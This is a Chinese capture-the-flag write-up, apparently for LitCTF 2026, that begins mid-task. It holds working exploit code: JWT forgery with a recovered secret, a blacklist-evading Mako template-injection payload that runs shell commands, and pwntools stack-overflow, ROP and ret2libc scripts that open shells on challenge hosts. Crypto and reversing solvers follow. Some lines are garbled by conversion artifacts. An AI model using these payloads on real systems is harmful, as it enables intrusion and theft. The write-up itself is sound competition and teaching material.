28 17 2D 05 68 6A 68 6C 05 36 33 2E 39 2E 3C 05
30 2D 2E 05 29 3F 39 28 3F 2E 05 31 3F 23 7B 7B

逐字节 XOR 0x5A：

`0x28`	`0x17`	`0x2D`	`0x05`	`0x68`	`0x6A`	`0x68`	`0x6C`
`r`	`M`	`w`	`\_`	`2`	`0`	`2`	`6`

完整字符串：

rMw_2026_litctf_jwt_secret_key!!

main.signJWT：claims 结构

// main.(*app).signJWT @ 0x9492a0
v16.RegisteredClaims.Issuer.str    = "reverseMyWeb";
v16.RegisteredClaims.Issuer.len    = 12;
v16.RegisteredClaims.Subject       = sub;
v16.RegisteredClaims.IssuedAt      = now (truncated);
v16.RegisteredClaims.ExpiresAt     = now + *24h*;
v16.Role                           = role;
SignedString(app.jwtKey)           // HS256

对应 Go 结构：


```go
type claims struct {
    Role string `json:"role"`
    jwt.RegisteredClaims
}

签发时算法是 SigningMethodHS256

main.parseToken：鉴权来源

// main.(*app).parseToken @ 0x949660
hdr = req.Header.Get("Authorization")
if strings.ToLower(hdr).hasPrefix("bearer ") {
    raw = strings.TrimSpace(hdr[7:])
} else if c, _ := req.Cookie("token"); c != nil {
    raw = c.Value
}
ParseWithClaims(raw, &main.claims{}, func(t) (interface{}, error) {
    return app.jwtKey, nil
})

也就是 token 可以放在 Authorization: Bearer \<jwt\> 或 Cookie: token=\<jwt\>。

main.handleFlag：访问控制

// main.(*app).handleFlag @ 0x9486a0
c = parseToken(req);
if (!c.ok)                      → 401 "会话无效或已过期"
if (c.role != "admin"           // 0x6e + 'admi' (1768776801)
        || len(c.role) != 5)    → 403 "您暂无此资源的访问权限"

data = os.ReadFile("/flag");
if wantsJSON(req): JSON {"content": strings.TrimSpace(data)}
else:              text/plain

1768776801 == \&\#39;admi\&\#39;$LE$、紧跟 \&\#39;n\&\#39;，长度 5 — 即字符串 \&\#34;admin\&\#34;。

接下来访问靶机，访问后是一个工作台，可以登录

先拿dirsearch扫，可以得到

GET  /
GET  /login
POST /login
GET  /register
POST /register
POST /logout
GET  /flag
GET  /static/*

我们直接用刚才拿到的key伪造JWT

*// header*
{"alg":"HS256","typ":"JWT"}

*// payload*
{"role": "admin","sub":  "admin","iss":  "reverseMyWeb","iat":  <now>,"exp":  <now + 86400>}

签名 = HMAC\_SHA256$secret, base64url\(header$ \+ \&\#34;\.\&\#34; \+ base64url$payload$\)。

解题脚本如下

import hmac
import hashlib
import base64
import json
import time
import urllib.request
import urllib.error

SECRET = b"rMw_2026_litctf_jwt_secret_key!!"
TARGET = "http://challenge.cyclens.tech:31020"

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_jwt(role: str = "admin", sub: str = "admin",
              iss: str = "reverseMyWeb", ttl: int = 86400) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    now = int(time.time())
    payload = {
        "role": role,
        "sub":  sub,
        "iss":  iss,
        "iat":  now,
        "exp":  now + ttl,
    }
    h = b64u(json.dumps(header,  separators=(",", ":")).encode())
    p = b64u(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(SECRET, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64u(sig)}"

def get_flag(token: str) -> str:
    req = urllib.request.Request(
        TARGET + "/flag",
        headers={
            "Authorization": "Bearer " + token,
            "Cookie":        "token=" + token,
            "Accept":        "application/json",
        },
    )
    with urllib.request.urlopen(req, timeout=20) as r:
        return r.read().decode("utf-8", errors="replace")

def decode_enc_key():
  
    enc_key = bytes.fromhex(
        "28172D05686A686C0536332E392E3C05"
        "302D2E05293F39283F2E05313F237B7B"
    )
    plain = bytes(b ^ 0x5A for b in enc_key)
    print("[*] encKey  :", enc_key.hex())
    print("[*] secret  :", plain.decode())
    assert plain == SECRET

if __name__ == "__main__":
    decode_enc_key()

    token = forge_jwt()
    print("[*] forged JWT:")
    print(token)

    print("[*] requesting /flag ...")
    try:
        body = get_flag(token)
        print("[+] response:")
        print(body)
    except urllib.error.HTTPError as e:
        print(f"[-] HTTP {e.code}")
        print(e.read().decode(errors="replace"))

运行拿到flag

flag{ivwqa2na-6enh-4yt-8bhr-3l5y8zkmygyx4}

lit_ezssti

进入后可以发现是一个模版渲染表单，那肯定就是打ssti了

测试一下常见的payload，比如{{7*7}}等等，发现都没用，直到试了下面这个

%if 1%

触发报错

根据这些字符串，可以推测是mako模版

fuzz一下，可以得到以下黑名单

[ ]
=
.
<%=
${
flag
self.

在mako中，可以用 <% ... %> 执行python代码，但是没有回显，这里我们可以用

raise Exception

实现渲染异常，从而得到回显

<% from os import popen; raise Exception(getattr(popen("whoami"), "read")()) %>

然后用from os import popen绕过os.popen

getattr(obj, "read")() 绕过 .read()

用chr拼接绕过flag

payload如下

<% from os import popen; raise Exception(getattr(popen(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)),chr(114)+chr(101)+chr(97)+chr(100))()) %>

拿到flag

flag{1wuiv7yx-mfmi-4uw-8usy-jhnfwupf1veau}

Pwn

lit_ret2text32

简单签到题

栈溢出有后门

from pwn import *
context(os='linux', log_level='debug')
p = process('./ret2text32')
#p=remote("challenge.cyclens.tech",30425)
elf=ELF("./ret2text32")

bk=0x8049213
payload=b'a'*0x3c+p64(bk)
p.sendlineafter("Input: ",payload)

p.interactive()

lit_ret2shellcode

栈段可执行，又泄露出了栈地址

直接向栈内写入shellcode，然后控制执行流到buf

from pwn import *
context(os='linux', log_level='debug',arch='amd64')
#p = process('./ret2shellcode')
p=remote("challenge.cyclens.tech",31103)
elf=ELF("./ret2shellcode")

p.recvuntil(b'0x')
buf=int(p.recv(12),16)
log.info("buf:"+hex(buf))

shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(0x78,b'a')
payload+=p64(buf)
p.sendlineafter("Leave your mark on the stack: ",payload)

p.interactive()

lit_integer_overflow

有后门backdoor，有栈溢出，只不过需要绕过对size的检测

注意到size比较时是unsigned int类型，整数溢出，输入-1

-1<0x40，绕过检测，同时负数转化为0xff……溢出空间足够大

from pwn import *
context(os='linux', log_level='debug',arch='amd64')
p = process('./integer_overflow')
#p=remote("challenge.cyclens.tech",31104)
elf=ELF("./integer_overflow")

bk=0x4011D8 
p.sendlineafter("(0-63): ",b'-1')
payload=b'a'*0x48+p64(bk)
p.sendline(payload)

p.interactive()

lit_ropchain

rop链，gadget都给出来了，有system没有binsh

先向bss段read一个/bin/sh\x00

read(0,bss,0x10)

然后打出

system("/bin/sh")

from pwn import *
context(os='linux', log_level='debug',arch='amd64')
#p = process('./ropchain')
p=remote("challenge.cyclens.tech",31002)
elf=ELF("./ropchain")

pop_rdi=0x401166
pop_rsi=0x40116B
pop_rdx=0x401170
bss = elf.bss() + 0x500
read=elf.plt["read"]
system=elf.plt["system"]

payload = b'a'*0x48
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += p64(0x10)
payload += p64(read)
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(system)
p.sendlineafter("Input: ",payload)

p.sendline(b'/bin/sh')

p.interactive()

lit_ret2syscall32

gadget很全，栈溢出空间足够，唯一一个问题是没有可用的/bin/sh

先调用read函数向bss段写binsh，然后返回到vuln

然后用syscall调用execve("/bin/sh",0,0)

from pwn import *
context(os='linux', log_level='debug')
#p = process('./ret2syscall32')
p=remote("challenge.cyclens.tech",30689)
elf=ELF("./ret2syscall32")

pop_eax=0x80491A6 
pop_ebx=0x80491AB
pop_ecx_ebx=0x80491B0
pop_edx=0x80491B6
int80=0x80491C1
bss=elf.bss()+0x200
#gdb.attach(p)
payload = flat(
    b"A" * 0x4c,
    elf.plt["read"],
    elf.sym["vuln"],    
    0,
    bss,
    10,
)

p.sendlineafter("Input: ",payload)
pause()
p.sendline(b'/bin/sh\x00')

payload = flat(
    b"A" * 0x4c,
    pop_eax,
    0xb,
    pop_ecx_ebx, 0, bss,
    pop_edx, 0,
    int80
)
p.sendlineafter("Input: ",payload)

p.interactive()lit_ret2libc

lit_ret2libc

leak可以泄露地址，把got表当作参数传入即可泄露libc

这里出了问题，跳回到vuln失败

不懂怎么回事，只能用其他方法打了

把 saved rbp 伪造成 .bss+0x40，然后跳到 vuln 里现成的 read 准备位置。这样程序会把第二阶段 payload 直接读进 .bss，最后用函数尾的 leave; ret 把栈迁移过去。

第二阶段

在 .bss 里放一个 "/bin/sh\x00" 和 argv = {"/bin/sh", NULL}，然后 ROP 调：

execve$\&\#34;/bin/sh\&\#34;, argv, NULL$

from pwn import *
context(os='linux', log_level='debug',arch='amd64')
#p = process('./ret2libc')
p=remote("challenge.cyclens.tech",31534)
elf=ELF("./ret2libc")
libc=ELF("./libc_remote.so")

ret=0x40101A
pop_rdi=0x4011B7
leak=0x4011C3
read_setup=0x40121B
bss=elf.bss()+0x800
fake_rbp=bss+0x40

stage1 = flat(
    b'a'*0x40,
    p64(fake_rbp),
    p64(ret),
    p64(pop_rdi),
    elf.got["puts"],
    p64(leak),
    p64(read_setup)
)
p.sendlineafter("Tell me your name: ",stage1)
p.recvuntil(b'0x')
puts=int(p.recv(12),16)
log.info("puts:"+hex(puts))

libc_base=puts-libc.sym["puts"]
execve=libc_base+libc.sym["execve"]
pop_rsi=libc_base+0x2be51
pop_rdx_r12=libc_base+0x11f367
ret2=libc_base+0x29139
log.info(hex(libc_base))
log.info(hex(execve))

binsh=bss+0x100
argv=bss+0x120

payload=bytearray(b'\x00'*0x180)
payload[0x100:0x108]=b'/bin/sh\x00'
payload[0x120:0x130]=flat(p64(binsh),p64(0))
rop=flat(
    p64(ret2),
    p64(pop_rdi),p64(binsh),
    p64(pop_rsi),p64(argv),
    p64(pop_rdx_r12),p64(0),p64(0),
    p64(execve)
)
payload[0x40:0x48]=p64(0)
payload[0x48:0x48+len(rop)]=rop
p.send(bytes(payload))

p.interactive()

Reverse

lit_rc4_variant

程序拖入IDA，找到main函数，输入长度要求29

把输入复制到加密缓冲

加密缓冲约定

KSA 第一阶段：`S[i] = i` 和 `K[i] = key[i % 12]

KSA 第二阶段

PRGA + XOR

总结这套魔改算法（encrypt$input$）：

S[64] = 0..63
K[i]  = key[i % len(key)]            for i in 0..63
j = 0
for i in 0..63:
    j = (j + S[i] + K[i]) mod 64
    swap(S[i], S[j])                 # 标准 KSA，但模 64 而不是 256

i = j = 0
for each byte b of plaintext:
    i = (i + 1) mod 64
    j = (j + S[i]) mod 64
    t = (S[i] + S[j]) mod 64         # ← 这里是 mod 64！
    swap(S[i], S[j])
    ks = (S[i] + S[t]) mod 256       # ← 输出是 “两个 S 项相加”，不是 S[(S[i]+S[j])&0xFF]
    cipher_byte = b ^ ks

比对密文

解题脚本

key = b"lit_rc4_key!"
ct = bytes([0x7b,0x3d,0x38,0x77,0x4e,0x72,0x42,0x7d,0x45,0x37,0x76,0x0f,
            0x53,0x53,0x4f,0x66,0x37,0x17,0x75,0x37,0x5f,0x49,0x58,0x72,
            0x74,0x7f,0x79,0x1f,0x3a])

S = list(range(64))
K = [key[i % len(key)] for i in range(64)]

j = 0
for i in range(64):
    j = (j + S[i] + K[i]) % 64
    S[i], S[j] = S[j], S[i]

i = j = 0
out = bytearray()
for c in ct:
    i = (i + 1) % 64
    s_i_old = S[i]
    j = (j + s_i_old) % 64
    s_j_old = S[j]
    t = (s_i_old + s_j_old) % 64
    # swap
    S[i], S[j] = S[j], S[i]
    # keystream = S[i]_new + S[t]   where S[t] uses post-swap state
    K_byte = (S[i] + S[t]) & 0xFF
    out.append(c ^ K_byte)

print("Plaintext:", out)
try:
    print("Decoded:", out.decode())
except UnicodeDecodeError:
    print("Not pure ASCII")

LitCTF{rev05_rc4_variant_64!}

lit_tea_standard

main函数如下

几个关键点：

明文长度：填充后 v7 == 32，意味着原 flag 长度落在 25..31（含 31，但 31 时填一个 \x01，长度则达到 32）。
轮数 / delta：循环条件 i != -957401312 即 i != 0xC6EF3720，恰好等于 32 * 0x9E3779B9，标准 TEA 32 轮。
密钥：把 + 形式里出现的负常量按无符号还原

16 * v 在 TEA 里就是 v << 4，对应分支：

v1 += ((v0 << 4) + k0) ^ (v0 + sum) ^ ((v0 >> 5) + k1)
v0 += ((v1 << 4) + k2) ^ (v1 + sum) ^ ((v1 >> 5) + k3)

再看一眼密文 g_cipher（位于 .rdata: 0x140012040，32 字节）：

解题脚本

import struct

ct = bytes.fromhex(
      "edef21feb79b3cb0"
      "1e9372e2023e29bc"
      "36f70c922e5aae46"
      "44fa45251ae58c87"
  )

k0, k1, k2, k3 = 0xCAFEBABE, 0xDEADBEEF, 0xA11CEFAC, 0xB00B1E00
delta = 0x9E3779B9
M = 0xFFFFFFFF

def decrypt_block(v0, v1):
      s = (32 * delta) & M
      for _ in range(32):
          v1 = (v1 - ((((v0 << 4) + k0) ^ (v0 + s) ^ ((v0 >> 5) + k1))) ) & M
          v0 = (v0 - ((((v1 << 4) + k2) ^ (v1 + s) ^ ((v1 >> 5) + k3))) ) & M
          s  = (s - delta) & M
      return v0, v1

pt = b""
for i in range(0, len(ct), 8):
      v0, v1 = struct.unpack("<II", ct[i:i+8])
      p0, p1 = decrypt_block(v0, v1)
      pt += struct.pack("<II", p0, p1)

pad = pt[-1]
print(pt[:-pad].decode())

LitCTF{rev03_tea_standard!!}

lit_b64_alphabet

IDA打开程序，逻辑全在main函数，就是一个换了字母表的Base64

每 3 字节 -> 24 bit -> 拆 4 段 6 bit -> 查表 g\_alphabet

末尾不足 3 字节用 = 补齐
编码结果与 g\_expected 直接 strcmp

字母表

2KuEphj84USZF67iloxzfYd+MrDgRG9yLwBnHAXcJq3eCN/s1bOQ5TvPa0tVkWmI

密文比对加判断

解题脚本

import base64

# 0x140012080: 自定义 Base64 字母表
CUSTOM_ALPHABET = "2KuEphj84USZF67iloxzfYd+MrDgRG9yLwBnHAXcJq3eCN/s1bOQ5TvPa0tVkWmI"

# RFC 4648 标准 Base64 字母表
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# 0x140012040: 程序内嵌的期望密文
EXPECTED = "zjA5lToj9PUAGn2O+v6TRPosgYWB6noyGjhBgjfwyl=="

def solve(ciphertext: str) -> str:
    assert len(CUSTOM_ALPHABET) == 64 and len(set(CUSTOM_ALPHABET)) == 64
    trans = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)
    mapped = ciphertext.translate(trans)
    return base64.b64decode(mapped).decode()

if __name__ == "__main__":
    flag = solve(EXPECTED)
    print("[+] mapped :", EXPECTED.translate(str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)))
    print("[+] flag   :", flag)

LitCTF{rev02_custom_b64_table!}

lit_xor_chain

main函数如下：

逻辑非常直白：

读入 30 字节字符串。
对每个字节先 xor 0x52，再 \+ 5。
与 g\_expected 数组逐字节比较。

解题脚本

expected = bytes([
    0x23, 0x40, 0x2B, 0x16, 0x0B, 0x19, 0x2E, 0x25,
    0x3C, 0x29, 0x67, 0x68, 0x12, 0x2F, 0x42, 0x25,
    0x12, 0x2B, 0x3F, 0x3C, 0x41, 0x12, 0x38, 0x3B,
    0x3B, 0x12, 0x42, 0x3E, 0x78, 0x34,
])

flag = bytes(((b - 5) & 0xFF) ^ 0x52 for b in expected)
print(flag.decode())

LitCTF{rev01_xor_then_add_ok!}

lit_xtea_tweak

输入先8字节对齐

PKC#7风格填充

明文长度32

魔改的xtea算法

4 × 32-bit 子密钥 g\_key
64-bit 块,32 轮
但常量 delta 被换成了 0xDEADBEEF
- 559038737 == 0x21524111 == \-0xDEADBEEF $mod 2^32$,所以 i \-= 559038737 即 i \+= 0xDEADBEEF
- 终止值 \-709370400 == 0xD5C593E0 == $0xDEADBEEF \* 32$ \& 0xFFFFFFFF

用到的数据

解题脚本

import struct

CIPHER = bytes([
    0xE3, 0xEE, 0x1E, 0xE7, 0xD3, 0xA7, 0x96, 0x6F,
    0xC6, 0xA7, 0xB9, 0xE1, 0xB9, 0x4E, 0x67, 0x86,
    0x5F, 0x03, 0x04, 0xA6, 0xDB, 0xBB, 0xB9, 0x40,
    0x56, 0x3A, 0xF7, 0x9E, 0xEE, 0x64, 0xD4, 0x06,
])

KEY = [0x11111111, 0x22222222, 0x33333333, 0x44444444]

DELTA  = 0xDEADBEEF
ROUNDS = 32
MASK   = 0xFFFFFFFF

def xtea_decrypt_block(v0: int, v1: int, key, rounds=ROUNDS, delta=DELTA):

    s = (delta * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) & MASK ^ (s + key[(s >> 11) & 3]) & MASK)) & MASK
        s  = (s - delta) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) & MASK ^ (s + key[s & 3]) & MASK)) & MASK
    return v0, v1

def main():
    plain = b""
    for i in range(0, len(CIPHER), 8):
        a, b = struct.unpack("<II", CIPHER[i:i+8])
        a, b = xtea_decrypt_block(a, b, KEY)
        plain += struct.pack("<II", a, b)

    pad = plain[-1]
    if 1 <= pad <= 8 and plain.endswith(bytes([pad]) * pad):
        plain = plain[:-pad]

    print("flag:", plain.decode())

if __name__ == "__main__":
    main()

LitCTF{rev04_xtea_delta_twk!}

Crypto

lit_xor_two_story

题目原件是一个py脚本

#!/usr/bin/env python3
"""
LitCTF2026 — One-time pad reused for two messages (40 bytes each).

Players receive output.txt and README; they do not receive secret.py.
"""
from __future__ import annotations

import argparse
import os
from pathlib import Path

try:
    from secret import M1_FLAG
except ImportError:
    raise SystemExit(
        "secret.py (organizer) is required to generate ciphertext; "
        "players work from output.txt only."
    )

# Public second message — duplicated in README for contestants.
M2_KNOWN = b"litctf2026_xor_keystream_reuse_40bytes!!"

assert len(M1_FLAG) == len(M2_KNOWN) == 40


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--write",
        type=Path,
        help="Write hex lines to file.",
    )
    args = parser.parse_args()

    n = len(M1_FLAG)
    k = os.urandom(n)
    c1 = xor_bytes(M1_FLAG, k)
    c2 = xor_bytes(M2_KNOWN, k)

    lines = [
        f"c1 = {c1.hex()}",
        f"c2 = {c2.hex()}",
        f"len = {n}",
    ]
    text = "\n".join(lines) + "\n"
    print(text, end="")
    if args.write:
        args.write.write_text(text, encoding="utf-8")


if __name__ == "__main__":
    main()

# c1 = 5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28
# c2 = 5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474
# len = 40

核心逻辑：

M2_KNOWN = b"litctf2026_xor_keystream_reuse_40bytes!!"   # 40 字节，已公开
assert len(M1_FLAG) == len(M2_KNOWN) == 40

n = len(M1_FLAG)
k = os.urandom(n)               # 随机密钥
c1 = xor_bytes(M1_FLAG, k)      # 加密 flag
c2 = xor_bytes(M2_KNOWN, k)     # 用同一把 k 加密公开消息

输出：

c1 = 5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28
c2 = 5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474
len = 40

关键点：同一把一次性密钥 `k` 被用于两条消息，且其中一条 `M2` 完全已知。这是经典的 OTP key‑reuse（two‑time pad）漏洞。

求解脚本

c1 = bytes.fromhex("5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28")
c2 = bytes.fromhex("5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474")
m2 = b"litctf2026_xor_keystream_reuse_40bytes!!"

flag = bytes(a ^ b ^ c for a, b, c in zip(c1, c2, m2))
print(flag.decode())

litctf{otp_reuse_never_twice_same_key__}

lit_elgamal_handshake

题目原件

#!/usr/bin/env python3
"""
LitCTF2026 — ElGamal handshake (story)
Someone left debug logging on; the private exponent x was printed alongside ciphertext.
"""
from __future__ import annotations

import argparse
from pathlib import Path
from random import randrange

from Crypto.Util.number import bytes_to_long, getPrime, getRandomRange

try:
    from secret import FLAG
except ImportError as e:
    raise SystemExit("secret.py (FLAG) is required to encrypt.") from e


def generate_elgamal_keypair(bits: int = 512) -> tuple[int, int, int, int]:
    p = getPrime(bits)
    for _ in range(1000):
        g = getRandomRange(2, min(6, p - 1))
        if pow(g, (p - 1) // 2, p) != 1:
            break
    else:
        raise RuntimeError("could not find suitable g")
    x = randrange(2, p - 1)
    y = pow(g, x, p)
    return p, g, y, x


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--write",
        type=Path,
        help="Write captured output to this file (for organizers).",
    )
    args = parser.parse_args()

    p, g, y, x = generate_elgamal_keypair(bits=512)
    k = randrange(1, p - 2)
    m = bytes_to_long(FLAG)
    if m >= p:
        raise ValueError("flag too large for chosen p — shorten FLAG")

    c1 = pow(g, k, p)
    c2 = (m * pow(y, k, p)) % p

    lines = [
        "=== Public key (p, g, y) ===",
        f"p = {p}",
        f"g = {g}",
        f"y = {y}",
        "",
        "=== Ciphertext (c1, c2) ===",
        f"c1 = {c1}",
        f"c2 = {c2}",
        "",
        "# [DEBUG] prod accidentally logged the long-term secret:",
        f"x = {x}",
    ]
    text = "\n".join(lines) + "\n"
    print(text, end="")
    if args.write:
        args.write.write_text(text, encoding="utf-8")


if __name__ == "__main__":
    main()

# === Public key (p, g, y) ===
# p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651
# g = 3
# y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357

# === Ciphertext (c1, c2) ===
# c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627
# c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654

# # [DEBUG] prod accidentally logged the long-term secret:
# x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884

题目实现了一个标准的 ElGamal 加密方案，但在调试输出中"意外地"打印了长期私钥 x。

公开参数

p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651
g = 3
y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357

密文

c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627
c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654

泄漏的私钥

x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884

ElGamal 回顾

加密过程：

选取随机数 k
c1 = g^k mod p
c2 = m · y^k mod p，其中 y = g^x mod p

解密过程：

共享秘密 s = c1^x mod p = g^$kx$ mod p = y^k mod p
明文 m = c2 · s^$\-1$ mod p

解题脚本

from Crypto.Util.number import long_to_bytes

p  = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651
g  = 3
y  = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357
c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627
c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654
x  = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884

s = pow(c1, x, p)
m = (c2 * pow(s, -1, p)) % p
print(long_to_bytes(m))

litctf{elgamal_leak_makes_happy_decrypt}

lit_rsa_neighbor

题目原件

#!/usr/bin/env python3
"""
LitCTF2026 — RSA where q is 'far' along the prime line but still close enough to p for Fermat.
"""
from __future__ import annotations

import argparse
from pathlib import Path

import gmpy2
from Crypto.Util.number import bytes_to_long, getPrime

try:
    from secret import FLAG, NEXT_PRIME_STEPS
except ImportError as e:
    raise SystemExit(
        "secret.py is required to generate output (FLAG, NEXT_PRIME_STEPS)."
    ) from e

E = 65537


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--write",
        type=Path,
        help="Write n, c to this file.",
    )
    args = parser.parse_args()

    p = getPrime(512)
    q = p
    for _ in range(NEXT_PRIME_STEPS):
        q = int(gmpy2.next_prime(q))

    n = p * q
    m = bytes_to_long(FLAG)
    if m >= n:
        raise ValueError("flag too large for n")

    c = pow(m, E, n)

    lines_players = [f"{n = }", f"{c = }", f"e = {E}"]
    text = "\n".join(lines_players) + "\n"
    print(text, end="")
    if args.write:
        args.write.write_text(text, encoding="utf-8")


if __name__ == "__main__":
    main()

# n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911
# c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429
# e = 65537

题目源码核心逻辑:

p = getPrime(512)
q = p
for _ in range(NEXT_PRIME_STEPS):
    q = int(gmpy2.next_prime(q))

n = p * q
c = pow(m, E, n)

q 是从 p 开始连续调用 next\_prime 若干次得到的,因此 p 和 q 非常接近(只差几个素数间隙)。

给定数据:

n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911
c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429
e = 65537

解题思路

当 `p` 和 `q` 很接近时,适用 Fermat 因式分解法:

设 n = p \* q,令 a = $p \+ q$ / 2,b = $q \- p$ / 2,则:

$n = a^2 - b^2$

从 a = ⌈√n⌉ 开始递增,每次检查 a² \- n 是否为完全平方数。当 p 和 q 接近时,a 离 √n 很近,迭代次数极少。

解题脚本

#!/usr/bin/env python3
import gmpy2
from Crypto.Util.number import long_to_bytes

n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911
c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429
e = 65537

# Fermat factorization
a = gmpy2.isqrt(n) + 1
count = 0
while True:
    b2 = a * a - n
    if gmpy2.is_square(b2):
        b = gmpy2.isqrt(b2)
        p = int(a - b)
        q = int(a + b)
        print(f"Found after {count} iterations")
        print(f"p = {p}")
        print(f"q = {q}")
        break
    a += 1
    count += 1
    if count % 100000 == 0:
        print(f"iter {count}")

assert p * q == n
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(int(m))
print(flag)

litctf{rsa_fermat_finds_close_primes}

lit_tiny_key_aes

题目原件

#!/usr/bin/env python3
"""
LitCTF2026 — AES-128-ECB with a mostly fixed key (weak operational policy).
"""
from __future__ import annotations

import argparse
from pathlib import Path

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

try:
    from secret import FLAG, UNKNOWN_KEY_SUFFIX
except ImportError as e:
    raise SystemExit(
        "secret.py is required to generate ciphertext (contains FLAG and key suffix)."
    ) from e

KEY_PREFIX = b"LitCTF2026!!!"  # 13 bytes; 3 bytes brute-forced
assert len(KEY_PREFIX) + len(UNKNOWN_KEY_SUFFIX) == 16


def encrypt_aes_ecb_pkcs7(plaintext: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.encrypt(pad(plaintext, AES.block_size))


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--write",
        type=Path,
        help="Write ciphertext hex to this file.",
    )
    args = parser.parse_args()

    key = KEY_PREFIX + UNKNOWN_KEY_SUFFIX
    c = encrypt_aes_ecb_pkcs7(FLAG, key)
    line = f"c = {c!r}\n"
    print(line, end="")
    if args.write:
        args.write.write_text(line, encoding="utf-8")


if __name__ == "__main__":
    main()

# c = b"\x0c\xdb'`\xc91\xf7\x05\x91+\x0fM\xed\xbc\x9b\xf1\xd8D\xcd\xfd\x0c\xb9\xb6\xb2J<\x86\x19\x06K\xb3\xa2\xa4\x18\x87<v\xac\x1bbu#\xaa\xb5I\x7f\xd8\xd3"

题目分析

题目给出一份 AES-128-ECB 加密脚本和一段密文：

KEY_PREFIX = b"LitCTF2026!!!"  # 13 bytes; 3 bytes brute-forced
assert len(KEY_PREFIX) + len(UNKNOWN_KEY_SUFFIX) == 16

关键信息：

AES-128 密钥共 16 字节
前 13 字节是已知常量 LitCTF2026\!\!\!
后 3 字节随机未知（即 UNKNOWN\_KEY\_SUFFIX）
注释里也写明 3 bytes brute\-forced

思路

未知部分仅 3 字节，搜索空间 256³ ≈ 1.6×10⁷，单机几十秒内即可枚举完。

对每个候选 key 解密，再用两条筛选条件锁定真 key：

PKCS7 unpad 不抛异常（过滤掉绝大多数错误 key）
解密结果全部是可打印 ASCII

解题脚本

#!/usr/bin/env python3
